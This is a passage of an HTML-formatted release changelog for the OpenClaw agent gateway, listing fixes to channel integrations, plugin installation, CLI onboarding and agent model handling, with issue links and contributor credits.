<p>Doctor/Telegram: warn when selected Telegram quote replies can suppress <code>streaming.preview.toolProgress</code>, and document the <code>replyToMode</code> trade-off without changing runtime delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342354447" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73487" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73487/hovercard" href="https://github.com/openclaw/openclaw/issues/73487">#73487</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GodsBoy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GodsBoy">@GodsBoy</a>.</p>
</li>
<li>
<p>Channels/Discord: send a best-effort native typing cue immediately after an inbound DM is accepted, so slow pre-dispatch turns show Discord liveness before queueing, context assembly, model, or tool work starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370775422" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76417" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76417/hovercard" href="https://github.com/openclaw/openclaw/issues/76417">#76417</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mlopez14/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mlopez14">@mlopez14</a>.</p>
</li>
<li>
<p>Plugins/install: reject source-only TypeScript package installs and installed plugin packages that are missing compiled runtime output, so broken npm artifacts fail at install/discovery time instead of falling through jiti and surfacing later as unavailable providers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372027509" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76720" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76720/hovercard" href="https://github.com/openclaw/openclaw/issues/76720">#76720</a>.</p>
</li>
<li>
<p>Plugins/config: deduplicate identical manifest compatibility diagnostics when an explicitly configured plugin overrides another discovered candidate, so external channel plugins do not print the same missing <code>channelConfigs</code> warning repeatedly during install and enable. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/status: honor explicit <code>messages.statusReactions.enabled: true</code> in tool-only guild channels so queued ack reactions can progress through thinking/done lifecycle reactions instead of stopping at the initial emoji. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvinthebored/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvinthebored">@Marvinthebored</a>.</p>
</li>
<li>
<p>Discord/native commands: compare Discord-normalized slash-command descriptions and localized descriptions during reconcile so CJK or multiline command text no longer triggers redundant startup PATCH bursts and rate-limit 429s. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371364237" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76587/hovercard" href="https://github.com/openclaw/openclaw/issues/76587">#76587</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhengsx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhengsx">@zhengsx</a>.</p>
</li>
<li>
<p>Agents/OpenAI: omit Chat Completions <code>reasoning_effort</code> for <code>gpt-5.4-mini</code> only when function tools are present while preserving tool-free Chat and Responses reasoning support, preventing Telegram-routed fallback runs from hanging after OpenAI rejects tool payloads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369566121" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76176" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76176/hovercard" href="https://github.com/openclaw/openclaw/issues/76176">#76176</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ThisIsAdilah/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ThisIsAdilah">@ThisIsAdilah</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</p>
</li>
<li>
<p>Telegram: reuse the successful startup <code>getMe</code> probe for grammY polling startup and continue into <code>getUpdates</code> after recoverable <code>deleteWebhook</code> cleanup failures, reducing high-latency Bot API control-plane calls before long polling starts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370661964" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76388" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76388/hovercard" href="https://github.com/openclaw/openclaw/issues/76388">#76388</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jackiedepp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jackiedepp">@jackiedepp</a>.</p>
</li>
<li>
<p>Gateway/diagnostics: merge session id/key aliases in diagnostic session state and activity tracking so completed runs no longer leave stale queued work behind that keeps liveness samples at warning level.</p>
</li>
<li>
<p>Agents/models: forward model <code>maxTokens</code> as the default output-token limit for OpenAI-compatible Responses and Completions transports when no runtime override is provided, preventing provider defaults from silently truncating larger outputs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371660728" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76645" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76645/hovercard" href="https://github.com/openclaw/openclaw/pull/76645">#76645</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joeyfrasier/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joeyfrasier">@joeyfrasier</a>.</p>
</li>
<li>
<p>macOS CLI/onboarding: honor sensitive wizard text steps in <code>openclaw-mac wizard</code> with termios no-echo input, suppressing saved credential previews while preserving long API keys and gateway tokens. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371933405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76698" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76698/hovercard" href="https://github.com/openclaw/openclaw/issues/76698">#76698</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anurag-bg-neu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anurag-bg-neu">@anurag-bg-neu</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</p>
</li>
<li>
<p>Control UI/Skills: fix skill detail modal silently failing to open in all browsers by deferring <code>showModal()</code> until the dialog element is connected to the DOM; the Lit <code>ref</code> callback fired before connection causing a <code>DOMException: HTMLDialogElement.showModal: Dialog element is not connected</code> on every skill click. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nickmopen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nickmopen">@nickmopen</a>.</p>
</li>
<li>
<p>Gateway/update: run <code>doctor --non-interactive --fix</code> after Control UI global package updates before reporting success, so legacy config is migrated before the gateway restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stevenchouai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stevenchouai">@stevenchouai</a>.</p>
</li>
<li>
<p>Gateway/cron: stop a lazy cron startup that loses a hot-reload race, preventing the old cron service from starting after reload has already replaced cron state.</p>
</li>
<li>
<p>CLI/plugins: warn when npm plugin installs remain shadowed by a failing config-selected source and surface the repair path in <code>plugins doctor</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LindalyX-Lee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LindalyX-Lee">@LindalyX-Lee</a>.</p>
</li>
<li>
<p>Agents/Telegram: preserve explicit reply and quote context in embedded model prompts without letting quoted text drive prompt-local image loading. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370779315" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76419" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76419/hovercard" href="https://github.com/openclaw/openclaw/issues/76419">#76419</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371728761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76659" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76659/hovercard" href="https://github.com/openclaw/openclaw/pull/76659">#76659</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cheechnd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cheechnd">@cheechnd</a>.</p>
</li>
<li>
<p>Active Memory: apply <code>setupGraceTimeoutMs</code> to the embedded recall runner as well as the outer prompt-build watchdog, so very-cold first recalls keep the configured setup grace end-to-end. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352275748" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74480" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74480/hovercard" href="https://github.com/openclaw/openclaw/pull/74480">#74480</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/volcano303/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/volcano303">@volcano303</a>.</p>
</li>
<li>
<p>Channels/Feishu: cap how long the per-chat sequential queue blocks subsequent same-key tasks behind a single in-flight task (5 min default), so a single hung dispatch no longer leaves later same-chat messages in <code>queued</code> state until gateway restart; the stuck task continues running but is evicted from the blocking chain and a warning is logged. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308531730" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70133" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70133/hovercard" href="https://github.com/openclaw/openclaw/issues/70133">#70133</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371855669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76687" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76687/hovercard" href="https://github.com/openclaw/openclaw/pull/76687">#76687</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bek91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bek91">@bek91</a>.</p>
</li>
<li>
<p>Active Memory: skip scoped Telegram forum-topic conversation ids (containing <code>:</code>) when resolving the embedded recall run channel, falling back to <code>messageProvider</code> instead, so Active Memory no longer throws a bundled-plugin dirName validation error in forum-topic sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371944266" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76704" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76704/hovercard" href="https://github.com/openclaw/openclaw/issues/76704">#76704</a>.</p>
</li>
<li>
<p>Agents/tools: defer automatic PDF model/auth resolution until the PDF tool is used, keeping agent-turn tool prep from probing auth profiles on messages without PDFs while preserving explicit PDF model registration. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371647356" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76644" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76644/hovercard" href="https://github.com/openclaw/openclaw/issues/76644">#76644</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>CLI/config: keep JSON dry-run patches validating touched channel configuration against bundled channel schemas even when the patch only contains SecretRef objects.</p>
</li>
<li>
<p>Plugins/tools: keep disabled bundled tool plugins out of explicit runtime allowlist ownership and fall back from loaded-but-empty channel registries to tool-bearing plugin registries, so Active Memory can use bundled <code>memory-core</code> search/get tools even when <code>memory-lancedb</code> is disabled. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371441459" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76603" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76603/hovercard" href="https://github.com/openclaw/openclaw/issues/76603">#76603</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jwong-art/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jwong-art">@jwong-art</a>.</p>
</li>
<li>
<p>Plugins/install: run <code>npm install</code> from the managed npm-root manifest so installing one <code>@openclaw/*</code> plugin preserves already installed sibling plugins instead of pruning them. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371289667" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76571" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76571/hovercard" href="https://github.com/openclaw/openclaw/issues/76571">#76571</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371440891" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76602" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76602/hovercard" href="https://github.com/openclaw/openclaw/pull/76602">#76602</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/byungskers/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/byungskers">@byungskers</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/crpol/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/crpol">@crpol</a>.</p>
</li>
<li>
<p>Plugins/context-engine: include the selected <code>plugins.slots.contextEngine</code> plugin in the gateway startup load plan so external context-engine plugins without <code>activation.onStartup</code> in their manifest are loaded before any agent turn resolves the active engine; prevents the "Context engine X is not registered; falling back to default engine legacy" warning after gateway startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371302001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76576" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76576/hovercard" href="https://github.com/openclaw/openclaw/issues/76576">#76576</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Plugins/tools: restore on-demand registry load for path-based plugins (origin "config") so tool factories registered via <code>plugins.load.paths</code> are resolved at agent request time when no pre-warmed channel registry is present; prevents "unknown method" errors after gateway startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371431770" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76598" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76598/hovercard" href="https://github.com/openclaw/openclaw/issues/76598">#76598</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Plugins/hooks: include explicitly enabled hook-capable plugins in the Gateway startup runtime scope so embedded PI runs can see their <code>before_prompt_build</code> and <code>agent_end</code> hooks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371680261" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76649" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76649/hovercard" href="https://github.com/openclaw/openclaw/issues/76649">#76649</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wwf3045/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wwf3045">@wwf3045</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MkDev11/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MkDev11">@MkDev11</a>.</p>
</li>
<li>
<p>Plugins/OpenCode: expose Claude thinking profiles through the lightweight provider policy surface so directive and session validation keep <code>xhigh</code>, <code>adaptive</code>, and <code>max</code> for <code>opencode/claude-opus-4-7</code> instead of remapping <code>xhigh</code> to <code>high</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371666992" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76648" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76648/hovercard" href="https://github.com/openclaw/openclaw/issues/76648">#76648</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aaajiao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aaajiao">@aaajiao</a>.</p>
</li>
<li>
<p>Channels/QQ Bot: resolve structured <code>clientSecret</code> SecretRefs before QQ token exchange, expose the QQ Bot secret contract to secrets tooling, and reject legacy <code>secretref:/...</code> marker strings. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355033110" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74772" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74772/hovercard" href="https://github.com/openclaw/openclaw/pull/74772">#74772</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xialonglee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xialonglee">@xialonglee</a>.</p>
</li>
<li>
<p>Agents: keep active streamed provider replies alive by refreshing guarded fetch timeouts on raw body chunks and surface true prompt stream timeouts as explicit errors instead of partial assistant fragments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370351854" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76307" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76307/hovercard" href="https://github.com/openclaw/openclaw/issues/76307">#76307</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371560110" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76633" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76633/hovercard" href="https://github.com/openclaw/openclaw/pull/76633">#76633</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MkDev11/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MkDev11">@MkDev11</a>.</p>
</li>
<li>
<p>Plugins/externalization: keep official ACPX, Google Chat, and LINE install specs on production package names, leaving beta-tag probing to the explicit OpenClaw beta update channel. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>CLI/doctor: keep missing-plugin repair from overriding official catalog metadata with runtime fallbacks, so ACPX repairs preserve the official npm spec during the externalization rollout. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>CLI/doctor: match stale bundled-plugin install records by exact parsed package name so doctor does not remove external npm or ClawHub records that only share an OpenClaw package-name prefix.</p>
</li>
<li>
<p>Plugins/catalog: preserve ClawHub install specs when generating the packaged channel catalog so future storepack-first channel plugins keep their remote source instead of becoming npm-only. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/catalog: pin bare npm specs from prerelease external channel catalog entries to the catalog entry version, so beta catalogs do not silently install the latest stable package.</p>
</li>
<li>
<p>Plugins/update: treat catalog-matched official npm updates and OpenClaw-authored externalized-bundled npm bridges as trusted official installs so launch-code plugins can update or migrate out of the bundled tree without scanner false positives. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/onboarding: fall back from ClawHub to npm only for missing package/version errors, keeping integrity and verification failures fail-closed during storepack rollout. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>CLI/onboarding: mask credential inputs (model-auth provider API keys, gateway tokens and passwords, web-search provider keys, and skill env-var values) in the interactive <code>openclaw onboard</code> wizard so pasted secrets no longer echo into terminal scrollback, <code>Start-Transcript</code> logs, or screenshots; existing tokens/passwords are preserved through a masked-preview confirm step before the sensitive prompt. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anurag-bg-neu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anurag-bg-neu">@anurag-bg-neu</a>.</p>
</li>
<li>
<p>Control UI/Talk: fix Talk (OpenAI Realtime WebRTC) CORS failure by stripping server-side-only attribution headers (<code>originator</code>, <code>version</code>, <code>User-Agent</code>) from browser offer headers; <code>api.openai.com/v1/realtime/calls</code> only allows <code>authorization</code> and <code>content-type</code> in its CORS preflight, so forwarding these headers caused the browser SDP exchange to fail. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370828107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76435" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76435/hovercard" href="https://github.com/openclaw/openclaw/issues/76435">#76435</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Chat delivery: make <code>/verbose on|full|off</code> changes affect subsequent tool-use chat bubbles again, including channels with draft preview tool progress enabled, while preserving one-shot verbose directives.</p>
</li>
<li>
<p>CLI/logs: auto-reconnect <code>openclaw logs --follow</code> on transient gateway disconnects with bounded backoff, stderr retry warnings, <code>[logs] gateway reconnected</code> recovery notices, and JSON <code>notice</code> records while still exiting immediately on non-recoverable auth or configuration errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355075599" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74782" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74782/hovercard" href="https://github.com/openclaw/openclaw/issues/74782">#74782</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357892191" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75059" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75059/hovercard" href="https://github.com/openclaw/openclaw/pull/75059">#75059</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362488693" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75372" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75372/hovercard" href="https://github.com/openclaw/openclaw/pull/75372">#75372</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shashank-poola/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shashank-poola">@shashank-poola</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</p>
</li>
<li>
<p>Codex/WhatsApp: keep the <code>message</code> dynamic tool available when Codex source replies are configured for message-tool delivery, so coding-profile chat agents do not complete turns privately without a visible channel reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371728923" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76660" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76660/hovercard" href="https://github.com/openclaw/openclaw/issues/76660">#76660</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371734457" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76663" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76663/hovercard" href="https://github.com/openclaw/openclaw/pull/76663">#76663</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VishalJ99/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VishalJ99">@VishalJ99</a>.</p>
</li>
<li>
<p>Codex/heartbeat: send heartbeat-specific initiative guidance through Codex turn-scoped collaboration-mode instructions, keeping ordinary message-tool chat turns in Default mode without heartbeat prompt leakage. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Plugins/onboarding: trust optional official plugin and web-search installs selected from the official catalog so npm security scanning treats them like other source-linked official install paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Agents/web_search: keep installed runtime provider discovery enabled when web-search metadata is missing, so externally installed official providers such as Brave remain visible to agent and cron turns instead of falling back to bundled-only lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371532832" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76626" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76626/hovercard" href="https://github.com/openclaw/openclaw/issues/76626">#76626</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Tests/plugins: expose the Discord npm onboarding Docker lane as a package script and assert planned Docker lanes point at real scripts, so external-channel onboarding coverage can actually run. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: explain unreleased ClawHub plugin artifacts as a rollout-state fallback to <code>npm:</code> installs instead of leaking raw archive metadata fields. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Tests/onboarding: assert packaged channel onboarding leaves <code>openclaw channels status --json</code> and plain <code>openclaw status</code> showing the configured channel, covering the empty Channels table regression path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Microsoft Teams: persist sent-message markers across Gateway restarts so follow-up replies to recent bot messages keep resolving the original conversation instead of dropping out after restart, with marker TTLs preserved on best-effort recovery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363955622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75585" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75585/hovercard" href="https://github.com/openclaw/openclaw/pull/75585">#75585</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Matrix: persist pending approval reaction targets across Gateway restarts so room approvers can still approve or deny outstanding prompts after OpenClaw comes back online. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363955743" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75586" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75586/hovercard" href="https://github.com/openclaw/openclaw/pull/75586">#75586</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
